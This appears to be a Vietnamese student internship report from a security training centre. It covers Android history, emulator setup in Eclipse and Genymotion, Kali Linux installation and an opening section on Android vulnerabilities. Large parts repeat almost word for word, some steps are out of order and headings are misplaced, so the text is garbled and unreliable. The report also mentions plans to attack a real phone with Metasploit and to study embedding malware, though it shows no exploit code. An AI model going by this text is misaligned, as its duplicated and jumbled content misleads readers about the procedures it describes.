Đội ngũ giảng viên
Tất cả giảng viên tại trung tâm ATHENA đều tốt nghiệp từ các trường đại học hàng đầu trong nước và sở hữu các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, cùng với bằng sư phạm Quốc.
- Thiết bị đầy đủ và hiện đại
- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ mới nhất
- Phòng máy rộng rãi, thoáng mát
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
- Giới thiệu việc làm cho mọi học viên
- Thực tập có lương cho học viên khá giỏi
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời gian
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng máy tính, bảo mật mạng
- Hỗ trợ thi Chứng chỉ Quốc tế
B – THỐNG KÊ QUÁ TRÌNH THỰC TẬP
- Giờ thực tập tại Trung tâm: 7h đến 10h, 3 buổi/ tuần
2 Liệt kê nội dung thực tập:
Bảng bên dưới là nội dung công việc trong suốt quá trình thực tập:
Thời gian Nội dung công việc
Ngày 22/7/2014 - Gặp giáo viên hướng dẫn, nhận đề tài thực tập và tài liệu hướng dẫn
- Cài đặt máy ảo Kali Linux trên phần mềm VMware workstation
- Tìm hiểu về Hệ điều hành Android, tìm hiểu các phiên bản Android
- Học và thi khóa học System Hacking
- Cài đặt Eclipse, bộ công cụ Java SE Development Kit, Android Developer Tools, Android SDK…
- Nghiên cứu tạo máy thiết bị chạy Android ảo trên Eclipse
- Nghiên cứu tạo máy ảo chạy Android trên phần mềm Genymotion Tìm hiểu ưu khuyết điểm của so với phần mềm Eclipse
- Nghiên cứu lỗ hổng bảo mật của Android Tìm
- Tìm hiểu máy chủ ảo VPS
- Tìm hiểu phần mềm Metasploit
- Cài đặt Metasploit trên máy chủ ảo VPS
- Nghiên cứu và tấn công vào điện thoại Android thật từ máy chủ ảo VPS
- Tổng hợp và làm báo cáo tổng kết
Ngày 3/11/2014 - Báo cáo tổng kết
C – NỘI DUNG THỰC TẬP CHI TIẾT
Tổng công ty Android (Android, Inc.) được thành lập vào tháng 10 năm 2003 tại Palo Alto, California bởi Andy Rubin, Rich Miner, Nick Sears và Chris White với mục tiêu phát triển các thiết bị di động thông minh có khả năng nhận diện vị trí và sở thích của người dùng Mặc dù các nhà sáng lập đều là những nhân vật nổi bật trong ngành công nghiệp công nghệ, công ty hoạt động khá âm thầm và chỉ tiết lộ rằng họ đang phát triển phần mềm cho điện thoại di động Tuy nhiên, vào cuối năm đó, Rubin gặp khó khăn tài chính và được người bạn Steve Perlman hỗ trợ 10.000 USD nhưng từ chối tham gia vào công ty.
Vào ngày 17 tháng 8 năm 2005, Google đã mua lại Tổng công ty Android, biến nó thành một bộ phận của mình, với các nhân viên chủ chốt như Rubin, Miner và White tiếp tục làm việc tại đây Mặc dù thông tin về Tổng công ty Android lúc bấy giờ còn hạn chế, nhiều người dự đoán rằng Google đang chuẩn bị gia nhập thị trường điện thoại di động Nhóm do Rubin dẫn dắt tại Google đã phát triển một nền tảng di động dựa trên nhân Linux, với cam kết cung cấp cho các nhà sản xuất điện thoại và nhà mạng một hệ thống linh hoạt và có khả năng nâng cấp Google đã chủ động liên hệ với nhiều hãng phần cứng và đối tác phần mềm, thể hiện sự sẵn sàng hợp tác ở nhiều cấp độ khác nhau.
Ngày càng nhiều thông tin cho rằng Google sẽ gia nhập thị trường điện thoại di động vào tháng 12 năm 2006 Theo BBC và Nhật báo Phố Wall, Google đang nỗ lực tích hợp công nghệ tìm kiếm và các ứng dụng của mình vào thiết bị di động.
Google, HTC, Intel, LG, Marvell Technology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile đã hợp tác để phát triển các tiêu chuẩn mở cho thiết bị di động Ngày ra mắt của Android đánh dấu sản phẩm đầu tiên của Liên minh, với nền tảng được xây dựng trên nhân Linux phiên bản 2.6 Chiếc điện thoại đầu tiên chạy Android, HTC Dream, được phát hành vào ngày 22 tháng 10 năm 2008, với biểu tượng đặc trưng là một con rôbốt màu xanh lá cây do Irina Blok thiết kế tại California.
Kể từ năm 2008, hệ điều hành Android đã trải qua nhiều bản cập nhật, cải tiến tính năng và sửa lỗi, với mỗi phiên bản được đặt tên theo thứ tự bảng chữ cái và theo tên món tráng miệng, ví dụ như Cupcake (1.5) và Donut (1.6), trong khi phiên bản mới nhất là Jelly Bean (4.2) Vào năm 2010, Google đã ra mắt dòng sản phẩm Nexus, bao gồm smartphone và tablet chạy Android, được sản xuất bởi các đối tác phần cứng như HTC với Nexus One, LG với Nexus 4, và Samsung với Nexus 10 Các thiết bị Nexus được xem là những sản phẩm chủ lực của Google, tích hợp các tính năng phần cứng và phần mềm mới nhất của Android.
Android là một hệ điều hành mã nguồn mở, được xây dựng trên nhân Linux, cho phép người phát triển tạo ra các tính năng phong phú và liên kết hơn cho người dùng Chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn và sử dụng máy ảnh được tối ưu hóa thông qua một máy ảo, giúp tiết kiệm bộ nhớ và phần cứng trong môi trường di động Nền tảng này không ngừng phát triển nhờ vào sự đóng góp của cộng đồng phát triển, nhằm tạo ra các ứng dụng di động hoàn hảo.
- Tính ngang bằng của các ứng dụng:
Trên nền tảng Android, ứng dụng điện thoại cơ bản và ứng dụng của bên thứ ba không có sự khác biệt, cho phép người dùng truy cập vào nhiều dịch vụ và ứng dụng Người dùng có thể tùy chỉnh trải nghiệm của mình, từ việc thay đổi màn hình nền, kiểu gọi điện thoại đến việc lựa chọn ứng dụng yêu thích Ngoài ra, người dùng còn có thể chỉ định cho điện thoại hiển thị những bức ảnh mà họ yêu thích.
- Phá vỡ rào cản phát triển ứng dụng:
Android mở ra cơ hội cho việc phát triển ứng dụng mới và cải tiến, cho phép lập trình viên kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân như danh bạ, lịch và vị trí Nhờ vào Android, người phát triển có thể tạo ra ứng dụng giúp người dùng theo dõi vị trí của bạn bè và nhận thông báo khi họ ở gần Tất cả những tính năng này được lập trình dễ dàng nhờ vào sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS.
- Xây dựng ứng dụng dễ dàng và nhanh chóng:
Android cung cấp một bộ thư viện giao diện lập trình ứng dụng phong phú và các công cụ mạnh mẽ để phát triển các ứng dụng phức tạp Nền tảng này cho phép các nhà phát triển xác định vị trí thiết bị và tạo điều kiện cho việc giao tiếp giữa các thiết bị, từ đó hình thành mạng xã hội chia sẻ ngang hàng Hơn nữa, Android đi kèm với một bộ công cụ toàn diện, giúp quá trình phát triển ứng dụng trở nên dễ dàng và hiệu quả hơn.
Ta có thể tải các tài liệu về các phiên bản Android từ Google qua liên kết sau: [http://source.android.com/compatibility/downloads.html](http://source.android.com/compatibility/downloads.html) Tại đây, người dùng sẽ nhận thấy bốn điểm khác biệt rõ rệt giữa hai phiên bản Android này.
- Giao diện (Graphical User Interface)
- Giao thức mạng (Network Protocol)
- Yêu cầu phần cứng (Hardware)
Giao diện đơn giản Giao diện trong suốt, tinh tế và phong cách hơn Không hỗ trợ phím ảo Hỗ trợ phím ảo
Không có widgets menu Có widgets menu
Xóa tất cả thông báo Xóa được từng thông báo
Chỉ có thể trả lời cuộc gọi khi màn hình bị khóa
Có thể thực hiện nhiều tính năng khi màn hình bị khóa
Không hỗ trợ nhận biết khuôn mặt Mở khóa bằng nhận biết khuôn mặt (face unclock)
Không có quản lý mức độ sử dụng dữ liệu
Có quản lý mức độ xử dụng dữ liệu
Quay phim độ nét không quá 480p Quay phim độ nét lên tới 1080p
Không hỗ trợ giao thức https Hỗ trợ giao thức https
Cung cấp ít nhất 128MB cho kernel
Cung cấp ít nhất 340MB cho kernel
Dung lượng RAM ít nhất là
Dung lượng RAM ít nhất là 350MB
Thiết bị phải có khả năng tải về Thiết bị phải có khả năng tải về gian mở ứng dụng:
Trình duyệt: ít hơn 1300ms
MMS/SMS: ít hơn 700ms
Báo thức: ít hơn 650ms gian mở ứng dụng:
Trình duyệt: ít hơn 1300ms MMS/SMS: ít hơn 700ms Cài đặt: ít hơn 700ms
Để giả lập thiết bị Android, cần cài đặt các công cụ và phần mềm ứng dụng phù hợp Bài viết này sẽ trình bày hai phương pháp thiết lập và giả lập thiết bị chạy Android bằng phần mềm Eclipse và Genymotion.
1 Hướng dẫn tải về và cài đặt JDK và SDK:
1.1 Tải và cài đặt JDK – Java SE Development Kit:
Bước 1: Tải JDK tại http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads- 1880260.html
Click chọn “Accept License Agreement”
Chọn phiên bản phù hợp với máy tính Ở đây ta chọn Windows x64
Bước 2: Sauk hi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa chọn Next Cuối cùng click Close
Bước 3: Để kiểm tra lại việc cài đặt JDK Ta mở cmd.exe
1.2 Tải về Eclipse Android Developer Tools và Android SDK:
Lưu ý khi ta tải về bộ này, sẽ gồm cả phần mềm Eclipse
Bước 1: Tải về tại link http://developer.android.com/sdk/index.html
Click vào I have read and agree… và chọn phiên bản 64-bit Click Download
Bước 2: Giải nén file vừa tải về Chạy SDK Manager.exe
Lưu ý là có thể gặp lỗi Fetching https://dl-sll Failed to fetch… Close thông báo này lại
Xuất hiển cửa sổ Choose Packages to Install Nếu cửa sổ này rỗng >
Quay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô Force https://
Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK Manager
Ta chọn các Packages muốn cài Và Install
Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License >
2 Hướng dẫn cài đặt thiết bị giả lập Android với phần mềm Eclipse:
Phần mềm Eclipse có chức năng Android Virtual Device cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…)
Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android
2.1 Các Tools cần thiết để cài đặt:
- Bộ Java SE Development Kit
- Bộ công cụ Android Debug Bridge ADB
2.2 Tích hợp Android SDK vào Eclipse:
Sau khi có phần mềm Eclipse và bộ Android SDK, ta cần tích hợp lại để sử dụng
Bước 1: Mở eclipse.exe trong thư mục giải nén file Eclipse Android Developer
Tools và Android SDK đã tải ở trên
D:\ Soft\adt-bundle-windows-x86_64-20140702\eclipse\eclipse.exe
Bước 2: Vào Help > Install new software… > Add
> Name: gõ tên tool muốn đặt
> Location: gõ địa chỉ tải về ADT https://dl.google.com/android/eclipse hoặc https://dl-ssl.google.com/android/eclipse
Bước 3: Ở cửa sổ Name > Tick vào Developer Tools
Bước 4: Chọn các Next > Next > Accept > Next > Finish – Run in Background
Bước 5: Vào Windows > Preferences > Android > Browse > Chỉ đường dẫn thư mục Android SDK đã tải > Apply > OK
Bước 6: Khởi đông lại Eclipse
2.3 Tạo máy ảo chạy Android trên phần mềm Eclipse:
Android Virtual Device là máy ảo cho developer phát triển ứng dụng
Sau đây là các bước tạo 1 AVD trên Eclipse
Bước 1: Mở eclipse.exe > Vào Windows > Android Virtual Device Manager >
Bước 2: Thiết đặt các thông số cần thiết:
Đặt tên cho thiết bị của bạn bằng cách chọn loại thiết bị mà bạn muốn tạo Tiếp theo, hãy lựa chọn phiên bản hệ điều hành phù hợp Cuối cùng, chọn kích cỡ màn hình mà bạn mong muốn, đảm bảo rằng nó tương thích với các yêu cầu của thiết bị.
SDcard: chọn thẻ nhớ ảo cho AVD
Bước 3: Click OK để tạo máy ảo
Khởi chạy bằng nút Start… > Launch
Bước 4: Chờ hoàn tất, ta được máy ảo chạy Android
Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác:
Bước 3: Next > Next > Next > Install > Finish
Bước 4: Giao diện phần mềm sau khi cài đặt xong
3.2 Tải về và cài đặt ứng dụng Genymotion:
Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com
Ta có thể đăng ký miễn phí và tải Genymotion về máy
Bước 2: Bắt đầu cài đặt phần mềm Genymotion Ta lựa chọn ngôn ngữ cài đặt
Bước 3: Chọn thư mục lưu cài đặt
Bước 4: Next > Next > Install > Finish
Bước 5: Mở Genymotion vừa cài đặt xong Ta vào thiết đặt 1 số thông số ở mục Settings
Step 7: In the ADB tab, select "Use custom Android SDK tools" and browse to the directory of the SDK in the folder where you downloaded the Android SDK Manager Then, save the settings.
F:\ Soft\adt-bundle-windows-x86_64-20140702\sdk
Xuất hiện cấu hình máy ảo sắp tạo:
Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play
Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công
III CÀI ĐẶT MÁY ẢO KALI LINUX
Kali Linux là hệ điều hành dựa trên nhân Linux, chuyên dụng cho kiểm tra bảo mật và thử nghiệm xâm nhập hệ thống máy tính Được phát triển trên nền tảng Debian, Kali Linux cải thiện khả năng tương thích với kiến trúc ARM, hỗ trợ mạng không dây tốt hơn, và cung cấp tính tùy biến cao Ngoài ra, hệ điều hành này cũng cho phép người dùng dễ dàng nâng cấp giữa các phiên bản trong tương lai.
Dịch vụ hỗ trợ
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
- Giới thiệu việc làm cho mọi học viên
- Thực tập có lương cho học viên khá giỏi
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời gian
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng máy tính, bảo mật mạng
- Hỗ trợ thi Chứng chỉ Quốc tế
B – THỐNG KÊ QUÁ TRÌNH THỰC TẬP
Thời gian thực tập
- Giờ thực tập tại Trung tâm: 7h đến 10h, 3 buổi/ tuần.
Liệt kê nội dung thực tập
Bảng bên dưới là nội dung công việc trong suốt quá trình thực tập:
Thời gian Nội dung công việc
Ngày 22/7/2014 - Gặp giáo viên hướng dẫn, nhận đề tài thực tập và tài liệu hướng dẫn
- Cài đặt máy ảo Kali Linux trên phần mềm VMware workstation
- Tìm hiểu về Hệ điều hành Android, tìm hiểu các phiên bản Android
- Học và thi khóa học System Hacking
- Cài đặt Eclipse, bộ công cụ Java SE Development Kit, Android Developer Tools, Android SDK…
- Nghiên cứu tạo máy thiết bị chạy Android ảo trên Eclipse
- Nghiên cứu tạo máy ảo chạy Android trên phần mềm Genymotion Tìm hiểu ưu khuyết điểm của so với phần mềm Eclipse
- Nghiên cứu lỗ hổng bảo mật của Android Tìm
- Tìm hiểu máy chủ ảo VPS
- Tìm hiểu phần mềm Metasploit
- Cài đặt Metasploit trên máy chủ ảo VPS
- Nghiên cứu và tấn công vào điện thoại Android thật từ máy chủ ảo VPS
- Tổng hợp và làm báo cáo tổng kết
Ngày 3/11/2014 - Báo cáo tổng kết
C – NỘI DUNG THỰC TẬP CHI TIẾT
TỔNG QUAN VỀ ANDROID
Giới thiệu
Tổng công ty Android (Android, Inc.) được thành lập vào tháng 10 năm 2003 tại Palo Alto, California bởi Andy Rubin, Rich Miner, Nick Sears và Chris White với mục tiêu phát triển "các thiết bị di động thông minh hơn có thể biết được vị trí và sở thích của người dùng" Mặc dù các nhà sáng lập đều là những nhân vật nổi bật trong ngành công nghiệp công nghệ, công ty hoạt động khá âm thầm, chỉ công bố rằng họ đang phát triển phần mềm cho điện thoại di động Tuy nhiên, vào cuối năm đó, Rubin gặp khó khăn về tài chính và đã nhận được 10.000 USD từ người bạn Steve Perlman, mặc dù Perlman từ chối tham gia vào công ty.
Vào ngày 17 tháng 8 năm 2005, Google đã mua lại Tổng công ty Android, biến nó thành một bộ phận của Google, với những nhân viên chủ chốt như Rubin, Miner và White tiếp tục làm việc tại đây Mặc dù thông tin về Tổng công ty Android lúc bấy giờ còn hạn chế, nhiều người đã dự đoán rằng Google có kế hoạch tham gia vào thị trường điện thoại di động Nhóm do Rubin dẫn dắt đã phát triển một nền tảng di động dựa trên nhân Linux, với cam kết cung cấp hệ thống linh hoạt và có khả năng nâng cấp cho các nhà sản xuất điện thoại và nhà mạng Google cũng đã thiết lập mối quan hệ với nhiều hãng phần cứng và đối tác phần mềm, thể hiện sự sẵn sàng hợp tác với các nhà mạng ở nhiều cấp độ khác nhau.
Ngày càng có nhiều suy đoán về việc Google sẽ gia nhập thị trường điện thoại di động vào tháng 12 năm 2006 Theo thông tin từ BBC và Nhật báo Phố Wall, Google đang nỗ lực tích hợp công nghệ tìm kiếm và các ứng dụng của mình vào điện thoại di động.
Google, HTC, Intel, LG, Marvell Technology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile đã hợp tác để phát triển các tiêu chuẩn mở cho thiết bị di động Ngày ra mắt của Android đánh dấu sản phẩm đầu tiên của Liên minh này, với nền tảng được xây dựng trên nhân Linux phiên bản 2.6 HTC Dream là chiếc điện thoại đầu tiên chạy Android, được phát hành vào ngày 22 tháng 10 năm 2008 Biểu tượng của hệ điều hành Android là một con rôbốt màu xanh lá cây, do nhà thiết kế Irina Blok tại California tạo ra.
Kể từ năm 2008, hệ điều hành Android đã trải qua nhiều bản cập nhật, cải tiến tính năng và sửa lỗi, với mỗi phiên bản được đặt tên theo thứ tự bảng chữ cái và các món tráng miệng, như phiên bản 1.5 Cupcake và 1.6 Donut, cho đến phiên bản mới nhất 4.2 Jelly Bean Năm 2010, Google giới thiệu dòng sản phẩm Nexus, bao gồm smartphone và tablet chạy Android, với sự hợp tác của HTC trong chiếc Nexus One đầu tiên Sau đó, nhiều thiết bị mới như Nexus 4 và Nexus 10, do LG và Samsung sản xuất, đã gia nhập dòng sản phẩm này, được xem là thiết bị Android chủ lực của Google với những tính năng phần cứng và phần mềm tiên tiến nhất.
Đặc điểm
Chức năng chính của điện thoại như gọi điện, nhắn tin và sử dụng camera cho phép các nhà phát triển mở rộng và kết nối nhiều tính năng cho người dùng Android, được xây dựng trên nền tảng Linux mã nguồn mở, sử dụng máy ảo tối ưu hóa cho bộ nhớ và phần cứng trong môi trường di động Với khả năng mở rộng, Android tạo điều kiện cho sự kết hợp linh hoạt giữa các công nghệ tiên tiến Nền tảng này sẽ tiếp tục phát triển nhờ sự đóng góp của cộng đồng phát triển, nhằm mang đến những ứng dụng di động hoàn hảo.
- Tính ngang bằng của các ứng dụng:
Trên nền tảng Android, không có sự phân biệt giữa ứng dụng điện thoại cơ bản và ứng dụng của bên thứ ba, cho phép người dùng truy cập đầy đủ vào các ứng dụng và dịch vụ Người dùng có thể tùy chỉnh thiết bị theo sở thích cá nhân, từ việc thay đổi màn hình nền, kiểu gọi điện thoại cho đến việc lựa chọn ứng dụng Hơn nữa, người dùng còn có khả năng hướng dẫn điện thoại chỉ hiển thị những bức ảnh mà họ yêu thích.
- Phá vỡ rào cản phát triển ứng dụng:
Android mở ra cơ hội cho việc phát triển ứng dụng mới và cải tiến Các nhà phát triển có thể tích hợp thông tin từ trang web với dữ liệu trên điện thoại, như danh bạ, lịch và vị trí bản đồ, để cung cấp thông tin chính xác hơn cho người dùng Với Android, họ có thể tạo ứng dụng cho phép người dùng theo dõi vị trí bạn bè và nhận thông báo khi bạn bè ở gần Tất cả những tính năng này được lập trình dễ dàng nhờ vào sự hỗ trợ của MapView và dịch vụ định vị GPS.
- Xây dựng ứng dụng dễ dàng và nhanh chóng:
Android cung cấp một bộ thư viện giao diện lập trình ứng dụng phong phú và các công cụ mạnh mẽ để phát triển ứng dụng phức tạp Nền tảng này cho phép nhà phát triển xác định vị trí thiết bị và tạo điều kiện cho các thiết bị giao tiếp, từ đó xây dựng mạng xã hội chia sẻ ngang hàng Hơn nữa, Android còn trang bị đầy đủ công cụ hỗ trợ, giúp quá trình phát triển trở nên dễ dàng hơn.
Tài liệu về các phiên bản Android do Google công bố có thể được tải xuống tại [đây](http://source.android.com/compatibility/downloads.html) Tại trang này, người dùng sẽ thấy bốn điểm khác biệt rõ rệt giữa các phiên bản Android.
- Giao diện (Graphical User Interface)
- Giao thức mạng (Network Protocol)
- Yêu cầu phần cứng (Hardware)
Giao diện đơn giản Giao diện trong suốt, tinh tế và phong cách hơn Không hỗ trợ phím ảo Hỗ trợ phím ảo
Không có widgets menu Có widgets menu
Xóa tất cả thông báo Xóa được từng thông báo
Chỉ có thể trả lời cuộc gọi khi màn hình bị khóa
Có thể thực hiện nhiều tính năng khi màn hình bị khóa
Không hỗ trợ nhận biết khuôn mặt Mở khóa bằng nhận biết khuôn mặt (face unclock)
Không có quản lý mức độ sử dụng dữ liệu
Có quản lý mức độ xử dụng dữ liệu
Quay phim độ nét không quá 480p Quay phim độ nét lên tới 1080p
Không hỗ trợ giao thức https Hỗ trợ giao thức https
Cung cấp ít nhất 128MB cho kernel
Cung cấp ít nhất 340MB cho kernel
Dung lượng RAM ít nhất là
Dung lượng RAM ít nhất là 350MB
Thiết bị phải có khả năng tải về Thiết bị phải có khả năng tải về
Tìm hiểu sự giống nhau và khác nhau của phiên bản Android 2.x và 4.x
Trình duyệt: ít hơn 1300ms
MMS/SMS: ít hơn 700ms
Báo thức: ít hơn 650ms gian mở ứng dụng:
Trình duyệt: ít hơn 1300ms MMS/SMS: ít hơn 700ms Cài đặt: ít hơn 700ms
THIẾT ĐẶT, GIẢ LẬP THIẾT BỊ CHẠY ANDROID
Hướng dẫn tải về và cài đặt JDK và SDK
1.1 Tải và cài đặt JDK – Java SE Development Kit:
Bước 1: Tải JDK tại http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads- 1880260.html
Click chọn “Accept License Agreement”
Chọn phiên bản phù hợp với máy tính Ở đây ta chọn Windows x64
Bước 2: Sauk hi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa chọn Next Cuối cùng click Close
Bước 3: Để kiểm tra lại việc cài đặt JDK Ta mở cmd.exe
1.2 Tải về Eclipse Android Developer Tools và Android SDK:
Lưu ý khi ta tải về bộ này, sẽ gồm cả phần mềm Eclipse
Bước 1: Tải về tại link http://developer.android.com/sdk/index.html
Click vào I have read and agree… và chọn phiên bản 64-bit Click Download
Bước 2: Giải nén file vừa tải về Chạy SDK Manager.exe
Lưu ý là có thể gặp lỗi Fetching https://dl-sll Failed to fetch… Close thông báo này lại
Xuất hiển cửa sổ Choose Packages to Install Nếu cửa sổ này rỗng >
Quay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô Force https://
Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK Manager
Ta chọn các Packages muốn cài Và Install
Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License >
Hướng dẫn cài đặt thiết bị giả lập Android với phần mềm Eclipse
Phần mềm Eclipse có chức năng Android Virtual Device cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…)
Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android
2.1 Các Tools cần thiết để cài đặt:
- Bộ Java SE Development Kit
- Bộ công cụ Android Debug Bridge ADB
2.2 Tích hợp Android SDK vào Eclipse:
Sau khi có phần mềm Eclipse và bộ Android SDK, ta cần tích hợp lại để sử dụng
Bước 1: Mở eclipse.exe trong thư mục giải nén file Eclipse Android Developer
Tools và Android SDK đã tải ở trên
D:\ Soft\adt-bundle-windows-x86_64-20140702\eclipse\eclipse.exe
Bước 2: Vào Help > Install new software… > Add
> Name: gõ tên tool muốn đặt
> Location: gõ địa chỉ tải về ADT https://dl.google.com/android/eclipse hoặc https://dl-ssl.google.com/android/eclipse
Bước 3: Ở cửa sổ Name > Tick vào Developer Tools
Bước 4: Chọn các Next > Next > Accept > Next > Finish – Run in Background
Bước 5: Vào Windows > Preferences > Android > Browse > Chỉ đường dẫn thư mục Android SDK đã tải > Apply > OK
Bước 6: Khởi đông lại Eclipse
2.3 Tạo máy ảo chạy Android trên phần mềm Eclipse:
Android Virtual Device là máy ảo cho developer phát triển ứng dụng
Sau đây là các bước tạo 1 AVD trên Eclipse
Bước 1: Mở eclipse.exe > Vào Windows > Android Virtual Device Manager >
Bước 2: Thiết đặt các thông số cần thiết:
Đặt tên cho thiết bị của bạn bằng cách chọn loại thiết bị mong muốn Tiếp theo, hãy xác định phiên bản hệ điều hành phù hợp Cuối cùng, chọn kích cỡ màn hình mà bạn muốn, đảm bảo rằng nó tương thích với nhu cầu sử dụng của bạn.
SDcard: chọn thẻ nhớ ảo cho AVD
Bước 3: Click OK để tạo máy ảo
Khởi chạy bằng nút Start… > Launch
Bước 4: Chờ hoàn tất, ta được máy ảo chạy Android
Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác:
Bước 3: Next > Next > Next > Install > Finish
Bước 4: Giao diện phần mềm sau khi cài đặt xong
3.2 Tải về và cài đặt ứng dụng Genymotion:
Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com
Ta có thể đăng ký miễn phí và tải Genymotion về máy
Bước 2: Bắt đầu cài đặt phần mềm Genymotion Ta lựa chọn ngôn ngữ cài đặt
Bước 3: Chọn thư mục lưu cài đặt
Bước 4: Next > Next > Install > Finish
Bước 5: Mở Genymotion vừa cài đặt xong Ta vào thiết đặt 1 số thông số ở mục Settings
Step 7: In the ADB tab, select "Use custom Android SDK tools" and browse to the SDK folder where you downloaded the Android SDK Manager After that, save the settings.
F:\ Soft\adt-bundle-windows-x86_64-20140702\sdk
Xuất hiện cấu hình máy ảo sắp tạo:
Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play
Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công.
Hướng dẫn cài đặt thiết bị giả lập Android trên phần mềm Genymotion
Kali Linux là một hệ điều hành dựa trên nhân Linux, được thiết kế đặc biệt cho việc kiểm tra bảo mật và thử nghiệm xâm nhập hệ thống máy tính Được phát triển trên nền tảng Debian, Kali Linux cải thiện khả năng tương thích với kiến trúc ARM, hỗ trợ mạng không dây tốt hơn, và cung cấp tính tùy biến cao Ngoài ra, hệ điều hành này cũng cho phép người dùng dễ dàng nâng cấp giữa các phiên bản trong tương lai.
CÀI ĐẶT MÁY ẢO KALI LINUX
Chuẩn bị
- Máy tính được cài đặt phầm mềm VMware workstation Ở đây ta sẽ dùng
- Download file ISO hệ điều hành Kali Linux 64 bit phiên bản 1.0.7 trên link www.kali.org/downloads
Tiến trình
Bước 1: Khởi động VMware Vào File > New Virtual Machine… (hoặc Ctrl+N)
Bước 2: Chọn Type là Custom (advanced) > Next
Bước 3: Yêu cầu file để cài đặt máy ảo, ta sẽ chọn I will install the operating
Bước 4: Chọn hệ thống là Linux, Version là Debian 7 64-bit > Next
Bước 5: Chọn vùng lưu máy ảo và đặt tên máy ảo là Debian 7 64 > Next
Bước 6: Cấu hình bộ xử lý là mặc định > Next
Bước 7: Chọn bộ nhớ RAM là 512MB > Next Lưu ý là phải phù hợp với máy thật)
Bước 8: Chọn loại Network là Bridged networking > Next
Bước 9: Cấp phát ổ đĩa cho máy ảo Ta cấp phát Maximum là 15GB Chọn Store virtual disk as a single file > Next
Bước 10: Ta sẽ trỏ file ISO vào máy ảo vừa tạo Click chuột phải vào tên máy ảo Debian 7 64 > Settings
Trỏ dòng CD/DVD (IDE) > phần Connection > Use ISO image file >
Ta dẫn đến file Kali Linux 64 bit.ISO
Bước 11: Máy ảo được khởi chạy Tại Boot menu > Chọn Graphical install
Bước 12: Ta chọn Language, Location, Keyboard > Continue
Bước 13: Sau đó ta phải cấu hình Network > đặt Hostname > đặt Domain name > Continue
Bước 14: Tạo Users name và Password > Continue Bước nay khá quan trọng, root password là mật khẩu để bạn đăng nhập vào máy ảo Debian 7 64
Bước 15: Cấu hình Clock > Next
Bước 16: Phân vùng ổ đĩa > ta để mặc định Guided – use entire disk > Continue
Khi xuất hiện yêu cầu Write the changes to disk? > chọn Yes > Continue Đợi Install System
Bước 17: Cấu hình Package manager > Xuất hiện yêu cầu Use the network mirror? > chọn No > Continue
Bước 18: Cài đặt GRUB boot loader > Install the GRUB boot loader to the master boot record? > chọn Yes > Continue
Bước 19: Ta đợi tiến trình cài đặt hoàn tất > Finish the Installation > Continue
Bước 20: Sau khi hoàn tất, máy ảo Debian 7 64 sẽ tự khởi động Ta đăng nhập với User là root và Password đã đặt
Android có ít lỗ hổng bảo mật nhưng lại hứng chịu nhiều mối đe dọa bảo mật nhất trong số các hệ điều hành di động
Theo báo cáo quý II/2013 của Trend Micro, Việt Nam đứng thứ 3 thế giới về việc tải xuống phần mềm độc hại trên ứng dụng Android và xếp thứ 2 về mức độ rủi ro liên quan đến thông tin riêng tư trên thiết bị di động.
Vào tháng 7/2014, công ty bảo mật Bluebox Labs đã công bố lỗ hổng mang tên Fake ID, cho phép các ứng dụng độc hại giả mạo các ứng dụng "chính hãng" từ các nhà phát triển đáng tin cậy Thông tin về lỗ hổng này đã nhanh chóng thu hút sự chú ý của cộng đồng an ninh mạng.
Google đưa ra tuyên bố đã vá lỗ hổng này từ tháng 4 vừa qua
Sau bản vá của Google trên hệ điều hành 4.4 KitKat, tất cả người dùng từ phiên bản 2.1 đến 4.4 (cập nhật trước tháng 4) đều gặp nguy cơ bị tấn công bởi Fake ID Điều này đồng nghĩa với việc hơn 82% người dùng Android đang bị đe dọa bởi lỗ hổng này.
2 Khái niệm và phân loại lỗ hổng bảo mật trên Android:
2.1 Khái niệm lỗ hổng bảo mật:
- Tất cả những đặc tính của phần mềm hoặc phần cứng cho phép người dùng không hợp lệ, có thể truy cập hay tăng quyền không cần xác thực
- Tổng quát, lỗ hổng là những phương tiện đối phương có thể lợi dụng để xâm nhập vào hệ thống
2.2 Phân loại lỗ hổng bảo mật:
- Lỗ hổng cho phép những người không được ủy quyền có thể xâm nhập từ xa không xác thực
2.3 Một số lỗ hổng bảo mật phổ biến:
- Lỗ hổng bảo mật “Master key” - là lỗi khóa bảo mật
